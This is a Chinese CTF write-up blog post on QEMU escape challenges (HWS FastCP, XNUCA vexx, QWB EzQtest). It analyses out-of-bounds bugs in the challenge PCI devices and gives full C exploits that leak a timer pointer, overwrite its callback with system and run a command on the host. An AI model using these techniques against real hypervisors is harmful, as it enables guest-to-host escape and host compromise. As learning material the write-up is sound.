从qemu逃逸到逃跑

2021-10-13

字数统计: 7.7k字 | 阅读时长≈ 40分

学习qemu，对于虚拟化的相关知识有了一些提升，先通过做题来巩固学到一些概念

2021 HWS FastCP

漏洞分析

void __fastcall FastCP_class_init(ObjectClass_0 *a1, void *data)
{
  PCIDeviceClass *v2; // rbx
  PCIDeviceClass *v3; // rax

  v2 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
                           a1,
                           "device",
                           "/root/source/qemu/hw/misc/fastcp.c",
                           293,
                           "FastCP_class_init");
  v3 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
                           a1,
                           (const char *)&dev,
                           "/root/source/qemu/hw/misc/fastcp.c",
                           294,
                           "FastCP_class_init");
  *(_DWORD *)&v3->vendor_id = 0xBEEFDEAD;
  v3->revision = 1;
  v3->realize = pci_FastCP_realize;
  v3->exit = pci_FastCP_uninit;
  v3->class_id = 0xFF;
  v2->parent_class.categories[0] |= 0x80uLL;
}

注册了verdor_id=0xBEEFDEAD和class_id = 0xff。

00000000 FastCPState     struc ; (sizeof=0x1A30, align=0x10, copyof_4530)
00000000 pdev            PCIDevice_0 ?
000008F0 mmio            MemoryRegion_0 ?
000009E0 cp_state        CP_state ?
000009F8 handling        db ?
000009F9                 db ? ; undefined
000009FA                 db ? ; undefined
000009FB                 db ? ; undefined
000009FC irq_status      dd ?
00000A00 CP_buffer       db 4096 dup(?)
00001A00 cp_timer        QEMUTimer_0 ?
00001A30 FastCPState     ends
  
00000000 CP_state        struc ; (sizeof=0x18, align=0x8, copyof_4529)
00000000                                         ; XREF: FastCPState/r
00000000 CP_list_src     dq ?
00000008 CP_list_cnt     dq ?
00000010 cmd             dq ?
00000018 CP_state        ends

FastCPState结构体如上所示，其中可以看到CP_buffer的大小为0x1000，其紧邻cp_timer函数指针。CP_state结构体有CP_list_src、CP_list_cnt和cmd。

uint64_t __fastcall fastcp_mmio_read(FastCPState *opaque, hwaddr addr, unsigned int size)
{
  if ( size != 8 && addr <= 0x1F || addr > 0x1F )
    return -1LL;
  if ( addr == 8 )
    return opaque->cp_state.CP_list_src;
  if ( addr <= 8 )
  {
    if ( !addr )
      return opaque->handling;
    return -1LL;
  }
  if ( addr != 16 )
  {
    if ( addr == 24 )
      return opaque->cp_state.cmd;
    return -1LL;
  }
  return opaque->cp_state.CP_list_cnt;
}

fastcp_mmio_read函数，主要是返回FastCPState变量的值。

void __fastcall fastcp_mmio_write(FastCPState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax

  if ( (size == 8 || addr > 0x1F) && addr <= 0x1F )
  {
    if ( addr == 16 )
    {
      if ( opaque->handling != 1 )
        opaque->cp_state.CP_list_cnt = val;
    }
    else if ( addr == 24 )
    {
      if ( opaque->handling != 1 )
      {
        opaque->cp_state.cmd = val;
        v4 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
        timer_mod(&opaque->cp_timer, v4 / 1000000 + 100);
      }
    }
    else if ( addr == 8 && opaque->handling != 1 )
    {
      opaque->cp_state.CP_list_src = val;
    }
  }
}

fastcp_mmio_write函数的功能主要是设置CP_list_cnt、CP_list_src以及执行opaque->cp_timer函数指针

void __fastcall fastcp_cp_timer(FastCPState *opaque)
{
  uint64_t v1; // rax
  uint64_t v2; // rdx
  __int64 v3; // rbp
  uint64_t v4; // r12
  uint64_t v5; // rax
  uint64_t cmd; // rax
  bool v7; // zf
  uint64_t v8; // rbp
  __int64 v9; // rdx
  FastCP_CP_INFO cp_info; // [rsp+0h] [rbp-68h] BYREF
  char buf[8]; // [rsp+20h] [rbp-48h] BYREF
  unsigned __int64 v12; // [rsp+28h] [rbp-40h]
  unsigned __int64 v13; // [rsp+38h] [rbp-30h]

  v13 = __readfsqword(0x28u);
  v1 = opaque->cp_state.cmd;
  cp_info.CP_src = 0LL;
  cp_info.CP_cnt = 0LL;
  cp_info.CP_dst = 0LL;
  switch ( v1 )
  {
    case 2uLL:
      v7 = opaque->cp_state.CP_list_cnt == 1;
      opaque->handling = 1;
      if ( v7 )
      {
        cpu_physical_memory_rw(opaque->cp_state.CP_list_src, &cp_info, 0x18uLL, 0);
        if ( cp_info.CP_cnt <= 0x1000 )
          cpu_physical_memory_rw(cp_info.CP_src, opaque->CP_buffer, cp_info.CP_cnt, 0);// write
        cmd = opaque->cp_state.cmd & 0xFFFFFFFFFFFFFFFCLL;
        opaque->cp_state.cmd = cmd;
        goto LABEL_11;
      }
      break;
    case 4uLL:
      v7 = opaque->cp_state.CP_list_cnt == 1;
      opaque->handling = 1;
      if ( v7 )
      {
        cpu_physical_memory_rw(opaque->cp_state.CP_list_src, &cp_info, 0x18uLL, 0);
        cpu_physical_memory_rw(cp_info.CP_dst, opaque->CP_buffer, cp_info.CP_cnt, 1);// read
        cmd = opaque->cp_state.cmd & 0xFFFFFFFFFFFFFFF8LL;
        opaque->cp_state.cmd = cmd;
LABEL_11:
        if ( (cmd & 8) != 0 )
        {
          opaque->irq_status |= 0x100u;
          if ( msi_enabled(&opaque->pdev) )
            msi_notify(&opaque->pdev, 0);
          else
            pci_set_irq(&opaque->pdev, 1);
        }
        goto LABEL_16;
      }
      break;
    case 1uLL:
      v2 = opaque->cp_state.CP_list_cnt;
      opaque->handling = 1;
      if ( v2 > 0x10 )
      {
LABEL_22:
        v8 = 0LL;
        do
        {
          v9 = 3 * v8++;
          cpu_physical_memory_rw(opaque->cp_state.CP_list_src + 8 * v9, &cp_info, 0x18uLL, 0);
          cpu_physical_memory_rw(cp_info.CP_src, opaque->CP_buffer, cp_info.CP_cnt, 0);
          cpu_physical_memory_rw(cp_info.CP_dst, opaque->CP_buffer, cp_info.CP_cnt, 1);
        }
        while ( opaque->cp_state.CP_list_cnt > v8 );
      }
      else
      {
        if ( !v2 )
        {
LABEL_10:
          cmd = v1 & 0xFFFFFFFFFFFFFFFELL;
          opaque->cp_state.cmd = cmd;
          goto LABEL_11;
        }
        v3 = 0LL;
        v4 = 0LL;
        while ( 1 )
        {
          cpu_physical_memory_rw(v3 + opaque->cp_state.CP_list_src, buf, 0x18uLL, 0);
          if ( v12 > 0x1000 )
            break;
          v5 = opaque->cp_state.CP_list_cnt;
          ++v4;
          v3 += 24LL;
          if ( v4 >= v5 )
          {
            if ( !v5 )
              break;
            goto LABEL_22;
          }
        }
      }
      v1 = opaque->cp_state.cmd;
      goto LABEL_10;
    default:
      return;
  }
  opaque->cp_state.cmd = 0LL;
LABEL_16:
  opaque->handling = 0;
}

重点需要关注fastcp_cp_timer函数：

case 2：从opaque->cp_state.CP_list_src读取到cp_info，然后将cp_info.CP_src写入到opaque->CP_buffer，长度为cp_info.CP_cnt，计算(opaque->cp_state.cmd & 0xFFFFFFFFFFFFFFFCLL)&8判断执行pci_set_irq；

case 4：先从opaque->cp_state.CP_list_src读取cp_info，然后将opaque->CP_buffer读取到cp_info.CP_dst，长度为cp_info.CP_cnt。

case 1：如果opaque->cp_state.CP_list_cnt大小大于0x10，则会根据cp_state.CP_list_cnt的大小循环从opaque->cp_state.CP_list_src读取结构体到cp_info，然后依次将CP_src中的数据写入到CP_buffer，然后从CP_buffer中读取数据到CP_dst，长度由CP_cnt指定。

这里需要注意除了case 2对cnt长度进行了检查，其他操作都没有检查cnt的长度，也就是存在一个数组越界的漏洞。

漏洞利用

这道题的利用思路其实不难，但是一直卡在一个关键的地方，花了一天多时间才搞定。

泄漏地址

前面已经说到case 4是有一个越界读，而在buffer缓冲区下面紧邻的是cp_timer函数指针。

00000000 QEMUTimer_0     struc ; (sizeof=0x30, align=0x8, copyof_1181)
00000000                                         ; XREF: FastCPState/r
00000000 expire_time     dq ?
00000008 timer_list      dq ?                    ; offset
00000010 cb              dq ?                    ; offset
00000018 opaque          dq ?                    ; offset
00000020 next            dq ?                    ; offset
00000028 attributes      dd ?
0000002C scale           dd ?
00000030 QEMUTimer_0     ends

那么我们直接利用这个越界读，读取cb指针，就能泄漏qemu地址。那么就需要越界读取0x1010处的地址。

我这里刚开始的思路是直接申请一个0x2000的缓冲区userbuf获得其物理地址phy_userbuf，然后用来读取数据。但是经过调试我读取完之后，在0x1010的数据并非我泄漏的数据。就是这个问题，困扰了我一天。

知道后面我才想到，如果一个物理页大小为0x1000，我就算使用mmap直接申请0x2000大小的缓冲区，虽然获得了连续的虚拟地址，但是这两个虚拟页对应的物理页并不一定是连续的。也就是说我最终读取了0x1010的数据到 phy_userbuf+0x1010的地址，然后我通过访问虚拟地址userbuf+0x1010得到的数据并不对应phy_userbuf+0x1010的数据。

所以这里我就需要去申请两个连续的物理页，这样的申请就需要不断去分配尝试，分配的两个虚拟页获得其物理地址，然后判断其对应的物理地址，看是否是连续的，然后来判断是否对应两个连续的物理页。

当我们能够获得两个连续的物理页地址时，再去泄漏地址，就能保证访问userbuf+0x1010对应的数据是phy_userbuf+0x1010的数据。

getshell

能够泄漏地址后，就能够得到system地址。

我们只需要修改QEMUTimer_0.cb的函数指针为system_plt地址，修改QEMUTimer_0.opaque为buffer地址，在buffer中构造cat /root/flag，最终通过fastcp_mmio_write中的case 0x18去触发即可。

EXP

#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <assert.h>

#define HEX(x) printf("[*]0x%016lx\n", (size_t)x)
#define LOG(addr) printf("[*]%s\n", addr)

unsigned char* mmio_mem;
uint64_t phy_userbuf;
char *userbuf;
uint64_t phy_userbuf1;
uint64_t phy_buf0;
char *userbuf1;
int fd;
void Err(char* err){
    printf("Error: %s\n", err);
    exit(-1);
}

void init_mmio(){
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if(mmio_fd < 0){
        Err("Open pci");
    }
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(mmio_mem<0){
        Err("mmap mmio_mem");
    }
}

void mmio_write(uint64_t addr, uint64_t value){
    *((uint64_t*)(mmio_mem+addr)) = value;
}

uint64_t mmio_read(uint64_t addr){
    return *((uint64_t*)(mmio_mem+addr)); 
}

void set_list_cnt(uint64_t cnt){
    mmio_write(0x10, cnt);
}

void set_src(uint64_t src){
    mmio_write(0x8, src);
}

void set_cmd(uint64_t cmd){
    mmio_write(0x18, cmd);
}

void set_read(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);

    set_cmd(0x4);
    sleep(1);
}

void set_write(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);

    set_cmd(0x2);
    sleep(1);
}

void set_read_write(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);

    set_cmd(0x1);
    sleep(1);
}

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;
    offset = ((uintptr_t)addr >> 9) & ~7;
    // ((uintptr_t)addr >> 12)<<3
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

/*
* transfer visual address to physic address
*/
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}


size_t va2pa(void *addr){
    uint64_t data;

    size_t pagesize = getpagesize();
    size_t offset = ((uintptr_t)addr / pagesize) * sizeof(uint64_t);

    if(lseek(fd,offset,SEEK_SET) < 0){
        puts("lseek");
        close(fd);
        return 0;
    }

    if(read(fd,&data,8) != 8){
        puts("read");
        close(fd);
        return 0;
    }

    if(!(data & (((uint64_t)1 << 63)))){
        puts("page");
        close(fd);
        return 0;
    }

    size_t pageframenum = data & ((1ull << 55) - 1);
    size_t phyaddr = pageframenum * pagesize + (uintptr_t)addr % pagesize;

    close(fd);

    return phyaddr;
}

void print_hex(uint64_t len, uint64_t offset){
    printf("===========================\n");
    for(int i = 0; i<len/8; i++){
        printf("    0x%lx\n", *(uint64_t*)(userbuf1+offset+i*8));
    }
}

size_t buf0, buf1;

void get_pages()
{
    size_t buf[0x1000];
    size_t arry[0x1000];
    size_t arr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, 0, 0);
    *(char *)arr = 'a';
    int n = 0;
    buf[n] = gva_to_gfn(arr);
    arry[n++] = arr;
    for (int i = 1; i < 0x1000; i++)
    {
        arr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, 0, 0);
        *(char *)arr = 'a';
        size_t fn = gva_to_gfn(arr);
        for (int j = 0; j < n; j++)
        {
            if (buf[j] == fn + 1 || buf[j] + 1 == fn)
            {
                LOG("consist pages");
                HEX(arr);
                HEX(fn);
                HEX(arry[j]);
                HEX(buf[j]);
                if (fn > buf[j])
                {
                    buf0 = arry[j];
                    buf1 = arr;
                    phy_buf0 = (buf[j]<<12);
                }
                else
                {
                    buf1 = arry[j];
                    buf0 = arr;
                    phy_buf0 = (fn<<12);
                }
                return;
            }
        }
        buf[n] = fn;
        arry[n++] = arr;
    }
}

int main(){

    fd = open("/proc/self/pagemap",O_RDONLY);
    if(!fd){
        perror("open pagemap");
        return 0;
    }
    get_pages();
    
    printf("init mmio:\n");
    init_mmio();

    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (userbuf == MAP_FAILED)
        Err("mmap userbuf");
    mlock(userbuf, 0x1000);
    phy_userbuf = va2pa(userbuf);
    printf("userbuf va: 0x%llx\n", userbuf);
    printf("userbuf pa: 0x%llx\n", phy_userbuf);

    memset(buf0, 'a', 0x1000);
    memset(buf1, 'a', 0x1000);
    printf("[++++] 0x%lx %p\n", buf0, buf0);
    printf("phy_buf0: 0x%lx\n", phy_buf0);

    printf("leak addr:\n");
    *(uint64_t*)(userbuf) = phy_userbuf;
    *(uint64_t*)(userbuf+0x8) = 0x1000;
    *(uint64_t*)(userbuf+0x10) = phy_buf0;
    *(uint64_t*)(userbuf+0xff8) = phy_buf0;
    set_write(0x1);
    sleep(1);
    for(int i=0; i<17; i++){
        *(uint64_t*)(userbuf+i*0x18) = phy_userbuf;
        *(uint64_t*)(userbuf+0x8+i*0x18) = 0x1040;
        *(uint64_t*)(userbuf+0x10+i*0x18) = phy_buf0;
    }
    set_read(0x1);
    //sleep(3);

    size_t buf_addr = *(size_t*)(buf1+0x18)+0xa00;
    size_t t_addr = *(uint64_t*)(buf1+0x10);
    printf("timer_addr: 0x%llx 0x%lx\n", buf_addr, t_addr);
    size_t system_plt = t_addr - 0x4dce80 + 0x2c2180;
    printf("system_plt: 0x%llx\n", system_plt);

    printf("write ptr:\n");
    for(int i=0; i<17; i++){
        *(uint64_t*)(userbuf+i*0x18) = phy_buf0;
        *(uint64_t*)(userbuf+0x8+i*0x18) = 0x1020;
        *(uint64_t*)(userbuf+0x10+i*0x18) = phy_buf0;
    }
    *(uint64_t*)(buf1+0x10) = system_plt;
    *(uint64_t*)(buf1+0x18) = buf_addr;
    char *command="cat /root/flag\x00";
    memcpy(buf0,command,strlen(command));
    printf("cover system addr\n");
    set_read_write(0x11);
    printf("trigger vul\n");
    set_read(0x1);
    return 0;
}

2019 XNUCA vexx

漏洞分析

void __fastcall pci_vexx_realize(PCIDevice_0 *pdev, Error_0 **errp)
{
  Object_0 *v2; // rbx
  MemoryRegion_0 *v3; // rax

  v2 = object_dynamic_cast_assert(
         &pdev->qdev.parent_obj,
         "vexx",
         "/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
         482,
         "pci_vexx_realize");
  pdev->config[61] = 1;
  if ( !msi_init(pdev, 0, 1u, 1, 0, errp) )
  {
    timer_init_full(
      (QEMUTimer_0 *)&v2[81].properties,
      0LL,
      QEMU_CLOCK_VIRTUAL,
      1000000,
      0,
      (QEMUTimerCB *)vexx_dma_timer,
      v2);
    qemu_mutex_init((QemuMutex_0 *)&v2[70].ref);
    qemu_cond_init((QemuCond_0 *)&v2[71].parent);
    qemu_thread_create((QemuThread_0 *)&v2[70].properties, "vexx", (void *(*)(void *))vexx_fact_thread, v2, 0);
    memory_region_init_io((MemoryRegion_0 *)&v2[56].parent, v2, &vexx_mmio_ops, v2, "vexx-mmio", 0x1000uLL);
    memory_region_init_io((MemoryRegion_0 *)&v2[62].parent, v2, &vexx_cmb_ops, v2, "vexx-cmb", 0x4000uLL);
    portio_list_init((PortioList_0 *)&v2[68].parent, v2, vexx_port_list, v2, "vexx");
    v3 = pci_address_space_io(pdev);
    portio_list_add((PortioList_0 *)&v2[68].parent, v3, 0x230u);
    pci_register_bar(pdev, 0, 0, (MemoryRegion_0 *)&v2[56].parent);
    pci_register_bar(pdev, 1, 4u, (MemoryRegion_0 *)&v2[62].parent);
  }
}

可以看到注册了两个mmio内存，分别为vexx-cmb和vexx-mmio。

漏洞点在于vexx_cmb_write和vexx-cmb_read的越界读写

void __fastcall vexx_cmb_write(VexxState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  uint32_t v4; // eax
  hwaddr v5; // rax

  v4 = opaque->memorymode;
  if ( (v4 & 1) != 0 )
  {
    if ( addr > 0x100 )
      return;
    LODWORD(addr) = opaque->req.offset + addr;
    goto LABEL_4;
  }
  if ( (v4 & 2) == 0 )
  {
    if ( addr > 0x100 )
      return;
    goto LABEL_4;
  }
  v5 = addr - 0x100;
  LODWORD(addr) = addr - 0x100;
  if ( v5 <= 0x50 )                             // oob up
LABEL_4:
    *(_QWORD *)&opaque->req.req_buf[(unsigned int)addr] = val;// write val
}

可以看到将val赋值给req.req_buf[addr]，而addr=opaque->req.offset + addr，这里的offset和addr都由我们指定，所以这里存在越界读写漏洞。

漏洞利用

越界读，泄漏地址。越界写，修改函数指针。

EXP

#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

unsigned char* mmio_mem;
uint64_t phy_userbuf;
char *userbuf;
unsigned char* cmb_mem;

void Err(char* err){
    printf("Error: %s\n", err);
    exit(-1);
}

void init_mmio(){
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if(mmio_fd < 0){
        Err("Open pci");
    }
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(mmio_mem<0){
        Err("mmap mmio_mem");
    }
}

void init_cmb(){
    int fdcmb = open("/sys/devices/pci0000:00/0000:00:04.0/resource1", O_RDWR|O_SYNC);
    if (fdcmb < 0) {
        Err("fdcmb open");
    }
    cmb_mem = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, 0);
    if (cmb_mem == MAP_FAILED) {
        Err("cmb");
    }
}

uint64_t mmio_read(uint64_t addr){
    return *(uint64_t*)(mmio_mem+addr);
}

void mmio_write(uint64_t addr, uint64_t value){
    *(uint64_t*)(mmio_mem+addr) = value;
}

void cmb_write(uint64_t addr, uint64_t value){
    *(uint64_t*)(cmb_mem+addr) = value;
}

uint64_t cmb_read(uint64_t addr){
    return *(uint64_t*)(cmb_mem+addr);
}

void set_offset(uint64_t val){
    outb(val, 0x240);
}

void set_mode(uint64_t val){
    outb(val, 0x230);
}

size_t va2pa(void *addr){
    uint64_t data;

    int fd = open("/proc/self/pagemap",O_RDONLY);
    if(!fd){
        perror("open pagemap");
        return 0;
    }

    size_t pagesize = getpagesize();
    size_t offset = ((uintptr_t)addr / pagesize) * sizeof(uint64_t);

    if(lseek(fd,offset,SEEK_SET) < 0){
        puts("lseek");
        close(fd);
        return 0;
    }

    if(read(fd,&data,8) != 8){
        puts("read");
        close(fd);
        return 0;
    }

    if(!(data & (((uint64_t)1 << 63)))){
        puts("page");
        close(fd);
        return 0;
    }

    size_t pageframenum = data & ((1ull << 55) - 1);
    size_t phyaddr = pageframenum * pagesize + (uintptr_t)addr % pagesize;

    close(fd);

    return phyaddr;
}

void dma_set_cmd(uint64_t val){
    mmio_write(0x98, val);
}

void dma_set_src(uint64_t src){
    mmio_write(0x80, src);
}

void dma_set_cnt(uint64_t cnt){
    mmio_write(0x90, cnt);
}

void dma_set_dst(uint64_t dst){
    mmio_write(0x88, dst);
}

void dma_write(uint64_t idx, uint64_t cnt){
    dma_set_src(idx);
    dma_set_cnt(cnt);
    dma_set_dst(phy_userbuf);

    dma_set_cmd(3);
    sleep(1);
}

int main(){
    int res = 0;
    printf("init mmio fd:\n");
    init_mmio();

    printf("init cmb:\n");
    init_cmb();

    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (userbuf == MAP_FAILED)
        Err("mmap userbuf");
    mlock(userbuf, 0x1000);
    phy_userbuf = va2pa(userbuf);
    printf("userbuf va: 0x%llx\n", userbuf);
    printf("userbuf pa: 0x%llx\n", phy_userbuf);

    res = ioperm(0x230, 0x30, 1);
    if (res < 0) {
        Err("ioperm");
    }

    printf("leak addr:\n");

    set_mode(1);
    set_offset(0xf0);
    size_t timer_addr = cmb_read(0x48);
    printf("timer_addr: 0x%lx\n", timer_addr);

    size_t system_plt = timer_addr - 0x4dcf10 + 0x2ab860;
    printf("system_plt: 0x%lx\n", system_plt);

    size_t sh_addr = timer_addr - 0x4dcf10 + 0x82871C;
    printf("sh_addr: 0x%lx\n", sh_addr);

    set_mode(1);
    set_offset(0xf0);
    size_t dev_addr = cmb_read(0x50);
    printf("dev_addr: 0x%lx\n", dev_addr);
    size_t buf_addr = dev_addr+0xce8;
    printf("buf_addr: 0x%lx\n", buf_addr);

    set_mode(1);
    set_offset(0xf0);
    size_t cmd1 = 0x20746163;
    size_t cmd2 = 0x6f6f722f;
    cmb_write(0x68, cmd1);
    size_t cmd3 = 0x6c662f74;
    size_t cmd4 = 0x00006761;
    cmb_write(0x6c, cmd2);
    cmb_write(0x70, cmd3);
    cmb_write(0x74, cmd4);

    printf("oob write:\n");
    set_mode(1);
    set_offset(0xf0);
    cmb_write(0x48, system_plt);
    cmb_write(0x50, buf_addr);

    dma_set_cmd(1);

    return 1;
}

2021 强网杯 EzQtest

漏洞分析

uint64_t qwb_mmio_read(struct qwb_state* arg1, int64_t arg2, int32_t arg3)
    uint64_t var_18 = -1
    uint64_t rax_1
    if (arg3 != 8)
        rax_1 = -1
    else
        if (arg2 u<= 0x30)
            switch (arg2)
                case 0
                    var_18 = zx.q(arg1->dma_using)
                case 8
                    if (arg1->dma_info_size == 0)
                        var_18 = zx.q(arg1->dma_idx)
                case 0x10
                    if (arg1->dma_info_size == 0 && arg1->dma_idx u<= 0x1f)
                        var_18 = *(arg1 + ((zx.q(arg1->dma_idx) + 0x50) << 5)) // src
                case 0x18
                    if (arg1->dma_info_size == 0 && arg1->dma_idx u<= 0x1f)
                        var_18 = *(arg1 + ((zx.q(arg1->dma_idx) + 0x50) << 5) + 8) // dst
                case 0x20
                    if (arg1->dma_info_size == 0 && arg1->dma_idx u<= 0x1f)
                        var_18 = *(arg1 + (zx.q(arg1->dma_idx) << 5) + 0xa10) // cnt
                case 0x28
                    if (arg1->dma_info_size == 0 && arg1->dma_idx u<= 0x1f)
                        var_18 = *(arg1 + (zx.q(arg1->dma_idx) << 5) + 0xa18) // cmd
                case 0x30
                    if (arg1->dma_info_size == 0)
                        qwb_do_dma(arg1)
                        var_18 = 1
        rax_1 = var_18
    return rax_1

在qwb_mmio_read函数中，主要是能够读取dam_info的成员变量

struct qwb_state* qwb_mmio_write(struct qwb_state* arg1, int64_t arg2, struct qwb_state* arg3, int32_t arg4)
    struct qwb_state* rax = arg1
    struct qwb_state* var_10 = rax
    if (arg4 == 8 && arg2 u<= 0x28)
        rax = sx.q(jump_table_a7e7ac[arg2]) + &jump_table_a7e7ac
        switch (rax)
            case 0x389216
                if (arg3 u<= 0x20)
                    rax = var_10
                    rax->dma_using = arg3.d
            case 0x389236
                rax = zx.q(var_10->dma_info_size)
                if (rax.d == 0 && arg3 u<= 0x1f)
                    rax = var_10
                    rax->dma_idx = arg3.d
            case 0x389268
                rax = zx.q(var_10->dma_info_size)
                if (rax.d == 0)
                    rax = zx.q(var_10->dma_idx)
                    if (rax.d u<= 0x1f)
                        rax = arg3
                        *(((zx.q(var_10->dma_idx) + 0x50) << 5) + var_10) = rax // src
            case 0x3892b4
                rax = zx.q(var_10->dma_info_size)
                if (rax.d == 0)
                    rax = zx.q(var_10->dma_idx)
                    if (rax.d u<= 0x1f)
                        rax = arg3
                        *(var_10 + ((zx.q(var_10->dma_idx) + 0x50) << 5) + 8) = rax // dst
            case 0x389304
                rax = zx.q(var_10->dma_info_size)
                if (rax.d == 0)
                    rax = zx.q(var_10->dma_idx)
                    if (rax.d u<= 0x1f)
                        rax = arg3
                        *(var_10 + (zx.q(var_10->dma_idx) << 5) + 0xa10) = rax // cnt
            case 0x389350
                rax = zx.q(var_10->dma_info_size)
                if (rax.d == 0)
                    rax = zx.q(var_10->dma_idx)
                    if (rax.d u<= 0x1f)
                        rax = var_10 + (zx.q(var_10->dma_idx) << 5) + 0xa18 // cmd
                        rax->__offset(0x0).q = zx.q(arg3.d & 1)
    return rax

qwb_mmio_write函数主要是能够设置dma_info的成员变量。

void __cdecl qwb_do_dma(QWBState_0 *opaque)
{
  _QWORD idx; // [rsp+10h] [rbp-10h]
  _QWORD idxa; // [rsp+10h] [rbp-10h]

  opaque->dma_using = 1;
  for ( idx = 0LL; idx < opaque->dma_info_size; ++idx )
  {
    if ( opaque->dma_info[idx].cmd )            // device -> address_space
    {
      if ( opaque->dma_info[idx].src + opaque->dma_info[idx].cnt > 0x1000 || opaque->dma_info[idx].cnt > 0x1000 )
        goto end;
    }
    else if ( opaque->dma_info[idx].dst + opaque->dma_info[idx].cnt > 0x1000 || opaque->dma_info[idx].cnt > 0x1000 )
    {                                           // address_space -> device
      goto end;
    }
  }
  for ( idxa = 0LL; idxa < opaque->dma_info_size; ++idxa )
  {
    if ( opaque->dma_info[idxa].cmd )
      pci_dma_write_3(                          // device -> address_space
        &opaque->pdev,
        opaque->dma_info[idxa].dst,
        &opaque->dma_buf[opaque->dma_info[idxa].src],
        opaque->dma_info[idxa].cnt);
    else
      pci_dma_read_3(
        &opaque->pdev,                          // address_space -> device
        opaque->dma_info[idxa].src,
        &opaque->dma_buf[opaque->dma_info[idxa].dst],
        opaque->dma_info[idxa].cnt);
  }
end:
  opaque->dma_using = 0;
}

重点关注的就是这个qwb_do_dma函数。该函数能够对dma_buf缓冲区进行读取。这里首先会检查src+cnt和dst+cnt是否大于0x1000，以及检查cnt是否大于0x1000。

但是，这里只检查了上界，并没有检查下界。也就是src+cnt和dst+cnt是可以为负数，那么这样就可以对dma_buf向上读取。

而在向上读取时，与dma_buf紧邻的是dma_info结构体，那么我们就可以修改dma_info来实现任意地址读写。

这道题还有一个特殊点在于，需要与2021 年强网杯的另一道题EzCloud结合起来，需要利用那道题的功能与qemu建立连接，全部操作都是以monitor命令的形式操作。这里本地搭建时为了简便，便直接将exp脚本的数据包转发到qemu内，使其直接与qemu通信，不需要再通过EzCloud转发。这里转发数据包使用socat:

1 2	#!/bin/sh socat TCP4-LISTEN:6666,reuseaddr,fork EXEC:"./launch.sh",stderr

关于Qtest命令行的命令，可以参考这篇文章。

漏洞利用

PCI设备初始化

这道题目的一个难点就在于，他并没有完整实现整个PCI设备的初始化，这里需要我们自己去完成PCI设备地址的初始化。

参考自这篇文章。

1、在 do_pci_register_device 中分配内存，对config内容进行设置，如 pci_config_set_vendor_id
2、在 pci_e1000_realize 中继续设置config，包括 pci_register_bar 中将BAR base address设置为全f
3、由于有ROM(efi-e1000.rom)，于是调用 pci_add_option_rom ，注册 PCI_ROM_SLOT 为BAR6
4、pci_do_device_reset (调用链前面提过) 进行清理和设置
5、KVM_EXIT_IO QEMU => KVM => VM 后，当VM运行port I/O指令访问config信息时，发生VMExit，VM => KVM => QEMU，QEMU根据 exit_reason 得知原因是 KVM_EXIT_IO ，于是从 cpu->kvm_run 中取出 io 信息，最终调用pci_default_read_config
6、设置完config后，在Linux完成了了对设备的初始化后，就可以进行通信了。当VM对映射的内存区域进行访问时，发生VMExit，VM => KVM => QEMU，QEMU根据 exit_reason 得知原因是 KVM_EXIT_MMIO ，于是从 cpu->kvm_run 中取出 mmio 信息，最终调用e1000_mmio_write

根据这个流程，要正确完成设备配置的需要向BAR写MMIO的地址。通过文档可以知道i440fx-pcihost初始化操作如下：

static void i440fx_pcihost_realize(DeviceState *dev, Error **errp)
{
..
    sysbus_add_io(sbd, 0xcf8, &s->conf_mem);
    sysbus_init_ioports(sbd, 0xcf8, 4);

    sysbus_add_io(sbd, 0xcfc, &s->data_mem);
    sysbus_init_ioports(sbd, 0xcfc, 4);
...
}

这里如果在命令行中之心命令info qtree可以知道qwb这个设备是i440fx-pcihost下面的设备，则该设备在初始化阶段会沿用父类i44fx绑定的端口。

这里初始化所需要的步骤如下：

1、将MMIO地址写入到qwb设备的BAR0地址

通过 0xcf8 端口设置目标地址

通过 0xcfc 端口写值

2、将命令写入qwb设备的COMMAND地址，触发pci_update_mappings

通过 0xcf8 端口设置目标地址

通过 0xcfc 端口写值

这里首先需要知道qwb设备的地址，qwb设备的Bus number为0，Device number为2，Function number为0，得出qwb的地址为0x80001000。

再结合设备中寄存器映射图，可以看到BAR0的偏移为0x10，COMMAND的偏移为4.

